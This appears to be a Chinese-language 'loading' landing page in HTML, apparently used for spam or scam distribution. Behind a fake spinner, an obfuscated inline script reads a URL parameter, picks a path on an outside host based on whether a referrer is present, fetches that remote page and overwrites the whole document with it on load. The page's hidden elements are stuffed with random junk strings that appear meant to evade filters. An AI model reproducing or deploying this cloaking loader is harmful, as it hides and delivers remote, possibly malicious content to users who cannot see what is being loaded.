<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .n1pt27A {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .n1pt27A .YPvH7xPz6 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .n1pt27A .content {
            line-height: 50px;
            text-align: center
        }

        .n1pt27A .img {
            width: 100%
        }

        .n1pt27A .qaZNR4u {
            text-align: center
        }

        .n1pt27A .qaZNR4u span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .n1pt27A .qaZNR4u span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .n1pt27A .qaZNR4u span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .n1pt27A .qaZNR4u span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .n1pt27A .qaZNR4u span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .n1pt27A .qaZNR4u span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .n1pt27A .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function lIz2j8FkI89u(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var N7pGcON = lIz2j8FkI89u('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ N7pGcON +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ N7pGcON +".html?a=share";
		}
		
        vvEEtT=url+"#"+new Date().getTime();
        vvEEtT && function() {
            $.get(vvEEtT, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<p  style='display:none'>KjJ1oyzYWpwir7v7nYnrgm4950k3uRNXh4c0Kd29XGo1GB3hrsgnMgV8RI6Pq5pbBn49r5em5ekobnWj8k9Y7HdTIlvUQhWCPvW</p>
<span style='display:none'>J9LVPyLVWxUNphTWLA6LrcIxjfTtjhwy01cczFnLZZadXQ4</span>
<div style='display:none'>cZHU8EkLXleCg3sfp8IlkKml</div>
<ul style='display:none' >xrCEMgLTVBKEZUy1rSXEn</ul>
<span style='display:none'>J9LVPyLVWxUNphTWLA6LrcIxjfTtjhwy01cczFnLZZadXQ4</span>
<span style='display:none'>J9LVPyLVWxUNphTWLA6LrcIxjfTtjhwy01cczFnLZZadXQ4</span><div class="n1pt27A">
    <div class="YPvH7xPz6">
        <div class="qaZNR4u">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>GuFYzoiuJV8xrOcqdZx671LVA6SF4M9nXv13Ataa2HYrpjKgOxe</p>
<h1 style='display:none' >My4LT9wB8SKaKDdHfFe51w7JZtQzhKOH8GZhKEPeZkhm0lfPt3FW1ROAALx9OY9ZgZKUlQO8lWLl1rP0i6HfCeSTzSha4A</h1>
<img  src='' style='display:none'>
<span style='display:none'>fmeYUfsi5ic6Z6HH22MZi17hd</span>
<span style='display:none'>fmeYUfsi5ic6Z6HH22MZi17hd</span>
<ul style='display:none' >r5r9wQfqt8qXCe</ul>
<span style='display:none'>fmeYUfsi5ic6Z6HH22MZi17hd</span>
<h1 style='display:none' >My4LT9wB8SKaKDdHfFe51w7JZtQzhKOH8GZhKEPeZkhm0lfPt3FW1ROAALx9OY9ZgZKUlQO8lWLl1rP0i6HfCeSTzSha4A</h1></body>
</html>